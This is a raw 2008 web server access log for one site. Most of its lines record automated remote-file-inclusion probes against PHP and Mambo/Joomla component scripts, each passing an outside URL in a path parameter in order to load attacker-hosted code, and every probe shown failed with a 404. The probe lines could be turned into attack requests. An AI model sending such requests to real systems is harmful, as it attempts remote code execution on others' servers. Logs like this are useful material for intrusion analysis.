219.93.191.226 - - [06/Jan/2008:12:01:17 -0800] "GET //send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:12:02:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:12:02:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
129.241.104.187 - - [06/Jan/2008:12:02:36 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "boitho.com-dc/0.86 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:12:03:08 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:12:03:10 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:12 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:12 -0800] "GET //login.php?dir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:12 -0800] "GET /logs//login.php?dir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:46 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:46 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:05:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.35.179 - - [06/Jan/2008:12:05:54 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
74.6.25.72 - - [06/Jan/2008:12:06:35 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.110.19.178 - - [06/Jan/2008:12:10:04 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.110.19.178 - - [06/Jan/2008:12:10:04 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
83.223.98.160 - - [06/Jan/2008:12:10:23 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [06/Jan/2008:12:10:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [06/Jan/2008:12:10:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://laserimpressionsllc.com/shop/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.233 - - [06/Jan/2008:12:11:21 -0800] "GET /logs/access_071203.log HTTP/1.0" 200 58478 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.177.22.242 - - [06/Jan/2008:12:11:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.177.22.242 - - [06/Jan/2008:12:11:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:12:04 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:12:05 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:12:05 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:12:12:09 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:12:18:20 -0800] "GET //skin/zero_vote/error.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:12:18:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:12:18:49 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.17.228.92 - - [06/Jan/2008:12:20:16 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.7.124.194 - - [06/Jan/2008:12:20:57 -0800] "GET //login.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.7.124.194 - - [06/Jan/2008:12:20:57 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.7.124.194 - - [06/Jan/2008:12:20:59 -0800] "GET /logs//login.php?dir=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:22:06 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.205 - - [06/Jan/2008:12:22:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.205 - - [06/Jan/2008:12:22:08 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:22:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.137 - - [06/Jan/2008:12:22:16 -0800] "GET /logs/access_071005.log HTTP/1.0" 200 49825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.217.130 - - [06/Jan/2008:12:23:47 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.217.130 - - [06/Jan/2008:12:23:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.musikverein-lohnsburg.at/echo? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:26:08 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:26:08 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.51.233.233 - - [06/Jan/2008:12:26:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sajin88.com/bbs/data1/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.27.79 - - [06/Jan/2008:12:26:46 -0800] "GET /logs/access_071025.log HTTP/1.0" 200 25205 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:28:02 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:28:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:21 -0800] "GET /megumi/Bracelet?M=A HTTP/1.1" 301 104 "http://images.search.yahoo.com/search/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D641&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=651&tt=1,999,670&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:22 -0800] "GET /megumi/Bracelet/?M=A HTTP/1.1" 200 1705 "http://images.search.yahoo.com/search/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D641&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=651&tt=1,999,670&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.132.140.60 - - [06/Jan/2008:12:30:30 -0800] "GET /!scanhttp://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:32 -0800] "GET /megumi/Bracelet/3_Blue_Opal_Bracelet_35.JPG HTTP/1.1" 200 983040 "http://images.search.yahoo.com/search/images/view?frame=top&back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D641&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=651&tt=1%2C999%2C670&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:52 -0800] "GET /megumi/Bracelet?M=A HTTP/1.1" 301 104 "http://images.search.yahoo.com/search/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D681&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=685&tt=2,000,026&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:53 -0800] "GET /megumi/Bracelet/?M=A HTTP/1.1" 200 1705 "http://images.search.yahoo.com/search/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D681&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=685&tt=2,000,026&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.75.45.173 - - [06/Jan/2008:12:30:56 -0800] "GET /megumi/Bracelet/3_Blue_Opal_Bracelet_35.JPG HTTP/1.1" 206 393216 "http://images.search.yahoo.com/search/images/view?frame=top&back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dbracelet%26ei%3DUTF-8%26fp_ip%3DDE%26js%3D1%26ni%3D20%26fr%3Dyfp-t-501%26b%3D681&w=2816&h=2112&imgurl=www.dmulk.com%2Fmegumi%2FBracelet%2F3_Blue_Opal_Bracelet_35.JPG&rurl=http%3A%2F%2Fwww.dmulk.com%2Fmegumi%2FBracelet%3FM%3DA&size=1.8MB&name=3_Blue_Opal_Bracelet_35.JPG&p=bracelet&type=jpeg&no=685&tt=2%2C000%2C026&oid=f72ad5a743ec5194&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:12:31:47 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.160.143.69 - - [06/Jan/2008:12:31:47 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:12:32:52 -0800] "GET /logs/access_071229.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:12:32:52 -0800] "GET /logs//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:12:34:01 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
65.254.58.42 - - [06/Jan/2008:12:34:02 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
217.67.229.2 - - [06/Jan/2008:12:35:50 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:39:56 -0800] "GET /logs/access_071229.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:39:56 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:12:39:59 -0800] "GET //common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
192.65.130.130 - - [06/Jan/2008:12:39:59 -0800] "GET /logs//common/db.php?commonpath=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
219.93.191.226 - - [06/Jan/2008:12:42:02 -0800] "GET /logs/access_071214.log//send_reminders.php?noSet=0&includedir=http://noob.freealoja.com.pt/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:12:42:55 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:52:38 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:52:41 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:52:41 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.156 - - [06/Jan/2008:12:52:57 -0800] "GET /tmp/?N=A HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:53:44 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.9.46.14 - - [06/Jan/2008:12:53:44 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://growingkids.org/forum/rasa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.232 - - [06/Jan/2008:12:54:58 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:12:55:14 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:12:55:14 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.145.141.25 - - [06/Jan/2008:12:55:14 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.132.191.251 - - [06/Jan/2008:12:58:06 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
66.132.191.251 - - [06/Jan/2008:12:58:06 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://misterbit.altervista.org/ftp-r0x/scan/pr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:59:56 -0800] "GET /logs/access_071229.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:59:56 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:12:59:56 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [06/Jan/2008:13:02:24 -0800] "GET /logs/access_071222.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [06/Jan/2008:13:02:25 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [06/Jan/2008:13:02:25 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:02:27 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:02:28 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:02:28 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:47 -0800] "GET /logs/access_071224.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:47 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:47 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:51 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:52 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:03:52 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:04:05 -0800] "GET /logs/access_071229.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:04:05 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:13:04:05 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.36 - - [06/Jan/2008:13:06:04 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.fabriziozingales.it//cic2/id_wav/.../fon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
